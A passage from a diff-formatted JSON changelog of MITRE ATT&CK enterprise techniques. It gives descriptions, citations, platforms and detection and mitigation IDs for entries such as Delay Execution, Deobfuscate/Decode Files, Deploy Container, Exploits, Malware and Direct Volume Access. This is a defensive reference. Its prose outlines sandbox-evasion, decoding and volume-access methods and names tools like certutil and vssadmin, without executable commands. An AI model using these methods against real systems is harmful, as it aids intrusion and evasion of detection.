+                            "url": "https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat"
+                        },
+                        {
+                            "source_name": "vxunderground debug",
+                            "description": "vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.",
+                            "url": "https://web.archive.org/web/20250904153443/https://github.com/vxunderground/VX-API/tree/main#anti-debug"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joas Antonio dos Santos, @C0d3Cr4zy",
+                        "TruKno"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 19:57:49.208000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0371: Detection Strategy for Debugger Evasion (T1622)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-20 14:31:34.778000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Internal Defacement",
+                    "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1491/001",
+                            "external_id": "T1491.001"
+                        },
+                        {
+                            "source_name": "Varonis",
+                            "description": "Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.",
+                            "url": "https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster Destructive Malware",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.",
+                            "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Integrity"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:05.030000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0082: Internal Website and System Content Defacement via UI or Messaging Modifications"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a1df809c-7d0e-459f-8fe5-25474bab770b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-24 18:03:15.021000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Delay Execution",
+                    "description": "Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems. \n\nAdversaries may utilize programmatic `sleep` commands or native system scheduling functionality, for example [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053). Benign commands or other operations may also be used to delay malware execution or ensure prior commands have had time to execute properly. Loops or otherwise needless repetitions of commands, such as `ping`, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1678",
+                            "external_id": "T1678"
+                        },
+                        {
+                            "source_name": "Joe Sec Nymaim",
+                            "description": "Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.",
+                            "url": "https://www.joesecurity.org/blog/3660886847485093803"
+                        },
+                        {
+                            "source_name": "Joe Sec Trickbot",
+                            "description": "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.",
+                            "url": "https://www.joesecurity.org/blog/498839998833561473"
+                        },
+                        {
+                            "source_name": "Revil Independence Day",
+                            "description": "Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.",
+                            "url": "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/"
+                        },
+                        {
+                            "source_name": "Netskope Nitol",
+                            "description": "Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.",
+                            "url": "https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Deloitte Threat Library Team",
+                        "Jeff Felling, Red Canary",
+                        "Jorge Orchilles, SCYTHE",
+                        "Ruben Dodge, @shotgunner101"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 19:57:37.301000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0372: Multi-Platform Detection Strategy for T1678 - Delay Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-12-14 16:46:06.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Deobfuscate/Decode Files or Information",
+                    "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1140",
+                            "external_id": "T1140"
+                        },
+                        {
+                            "source_name": "Volexity PowerDuke November 2016",
+                            "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.",
+                            "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
+                        },
+                        {
+                            "source_name": "Sentinel One Tainted Love 2023",
+                            "description": "Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025.",
+                            "url": "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/"
+                        },
+                        {
+                            "source_name": "Malwarebytes Targeted Attack against Saudi Arabia",
+                            "description": "Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.",
+                            "url": "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/"
+                        },
+                        {
+                            "source_name": "Carbon Black Obfuscation Sept 2016",
+                            "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.",
+                            "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Crist\u00f3bal Mart\u00ednez Mart\u00edn",
+                        "Matthew Demaske, Adaptforward",
+                        "Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2026-04-15 19:58:25.069000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0275: Detect Adversary Deobfuscation or Decoding of Files and Payloads"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-03-29 16:51:26.020000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Deploy Container",
+                    "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Container)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1610",
+                            "external_id": "T1610"
+                        },
+                        {
+                            "source_name": "AppSecco Kubernetes Namespace Breakout 2020",
+                            "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume \u2014 Part 1. Retrieved January 16, 2024.",
+                            "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216"
+                        },
+                        {
+                            "source_name": "Aqua Build Images on Hosts",
+                            "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.",
+                            "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"
+                        },
+                        {
+                            "source_name": "Docker Container",
+                            "description": "DockerDocs. (n.d.). Retrieved December 8, 2025.",
+                            "url": "https://docs.docker.com/reference/cli/docker/container/create/"
+                        },
+                        {
+                            "source_name": "Kubernetes Workload Management",
+                            "description": "Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.",
+                            "url": "https://kubernetes.io/docs/concepts/workloads/controllers/"
+                        },
+                        {
+                            "source_name": "Kubeflow Pipelines",
+                            "description": "The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.",
+                            "url": "https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/"
+                        },
+                        {
+                            "source_name": "Kubernetes Dashboard",
+                            "description": "The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.",
+                            "url": "https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alfredo Oliveira, Trend Micro",
+                        "Ariel Shuper, Cisco",
+                        "Center for Threat-Informed Defense (CTID)",
+                        "Idan Frimark, Cisco",
+                        "Joas Antonio dos Santos, @C0d3Cr4zy",
+                        "Magno Logan, @magnologan, Trend Micro",
+                        "Pawan Kinger, @kingerpawan, Trend Micro",
+                        "Vishwas Manral, McAfee",
+                        "Yossi Weizman, Azure Defender Research Team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-15 19:59:11.024000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1030: Network Segmentation",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0249: Behavior-chain detection for T1610 Deploy Container across Docker & Kubernetes control/node planes"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:48:15.511000+00:00",
+                    "modified": "2026-05-12 15:12:00.711000+00:00",
+                    "name": "Exploits",
+                    "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1587/004",
+                            "external_id": "T1587.004"
+                        },
+                        {
+                            "source_name": "Irongeek Sims BSides 2017",
+                            "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.",
+                            "url": "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims"
+                        },
+                        {
+                            "source_name": "NYTStuxnet",
+                            "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.",
+                            "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.711000+00:00\", \"old_value\": \"2025-10-24 17:49:17.967000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0894: Detection of Exploits"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:33:01.433000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Malware",
+                    "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nDuring malware development, adversaries may intentionally include indicators aligned with other known actors in order to mislead attribution by defenders.(Citation: Olympic Destroyer)(Citation: Risky Bulletin Threat actor impersonates FSB APT)(Citation: GamaCopy organization)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1587/001",
+                            "external_id": "T1587.001"
+                        },
+                        {
+                            "source_name": "Risky Bulletin Threat actor impersonates FSB APT",
+                            "description": "Catalin Cimpanu. (2025, January 22). Risky Bulletin: Threat actor impersonates FSB APT for months to target Russian orgs. Retrieved June 14, 2025.",
+                            "url": "https://news.risky.biz/risky-bulletin-threat-actor-impersonates-fsb-apt-for-months-to-target-russian-orgs/"
+                        },
+                        {
+                            "source_name": "ActiveMalwareEnergy",
+                            "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.",
+                            "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/"
+                        },
+                        {
+                            "source_name": "FireEye APT29",
+                            "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.",
+                            "url": "https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf"
+                        },
+                        {
+                            "source_name": "Kaspersky Sofacy",
+                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.",
+                            "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
+                        },
+                        {
+                            "source_name": "GamaCopy organization",
+                            "description": "Knownsec 404 Advanced Threat Intelligence team. (2025, January 21). Love and hate under war: The GamaCopy organization, which imitates the Russian Gamaredon, uses military \u2014 related bait to launch attacks on Russia. Retrieved June 14, 2025.",
+                            "url": "https://medium.com/@knownsec404team/love-and-hate-under-war-the-gamacopy-organization-which-imitates-the-russian-gamaredon-uses-560ba5e633fa"
+                        },
+                        {
+                            "source_name": "Mandiant APT1",
+                            "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+                        },
+                        {
+                            "source_name": "Olympic Destroyer",
+                            "description": "Paul Rascagneres, Martin Lee. (2018, February 26). Who Wasn\u2019t Responsible for Olympic Destroyer?. Retrieved June 14, 2025.",
+                            "url": "https://blog.talosintelligence.com/who-wasnt-responsible-for-olympic/"
+                        },
+                        {
+                            "source_name": "FBI Flash FIN7 USB",
+                            "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.",
+                            "url": "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:30.776000+00:00\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0872: Detection of Malware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:20.934000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Direct Volume Access",
+                    "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.(Citation: Hakobyan 2009)\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1006",
+                            "external_id": "T1006"
+                        },
+                        {
+                            "source_name": "Github PowerSploit Ninjacopy",
+                            "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.",
+                            "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1"
+                        },
+                        {
+                            "source_name": "Hakobyan 2009",
+                            "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.",
+                            "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin"
+                        },
+                        {
+                            "source_name": "LOLBAS Esentutl",
+                            "description": "LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"
+                        }
+                    ],
+                    "object_marking_refs": [
